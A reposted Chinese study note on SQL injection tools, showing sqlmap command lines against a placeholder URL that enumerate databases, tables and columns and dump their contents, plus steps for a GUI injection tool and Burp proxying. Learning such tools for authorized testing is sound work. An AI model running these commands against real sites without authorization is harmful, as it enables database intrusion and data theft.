ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

Cyber Security-Day9(sqlmap和超级sql使用)

2022-07-06 00:00:47  阅读:192  来源: 互联网

标签:sqlmap http Day9 -- technique batch Cyber id


1.sqlmap的使用

例子:http://xxxxxxxxxxx?id=*7

python sqlmap.py -u "http://xxxxxxxxx.php?id=*7" --batch --random-agent --technique U --dbs

-u 指定地址

--batch 测试过程中, 执行所有默认配置

--technique=     (默认全部使用)

B       基于布尔的盲注

T       基于时间的盲注

E      基于报错的注入

U      基于UNION查询注入

S      基于多语句查询注入

—dbs 所有的数据库

 

 

看到所有的库我们指定库去查找所有的表

python sqlmap.py -u "http://xxxxxx.php?id=*7" --batch --random-agent --technique U -d db_math4a11 --tables

—tables 所有的表

 

 

接下来根据表去查找列,根据列去查找值

python sqlmap.py -u "http://xxxxxxxxx.php?id=*7" --batch --random-agent --technique U -D information_schema -T TABLES --columns

python sqlmap.py -u "http://xxxxxxxxx.php?id=*7" --batch --random-agent --technique U -D information_schema -T TABLES -C ENGINE --dump

如果需要配置BP,使我们可以看到抓包输入的值,GET POST请求,最后加

--proxy https://127.0.0.1:1080

2.超级SQL注入的使用

(1)填入URL

(2)转换为GET或者POST

 

 

(3)识别注入

(4)注入完毕,我们去查看注入记录,以及在数据中心设置环境变量,然后去查库,表,列,数值

 

 

标签:sqlmap,http,Day9,--,technique,batch,Cyber,id
来源: https://www.cnblogs.com/hanstedt/p/16449135.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有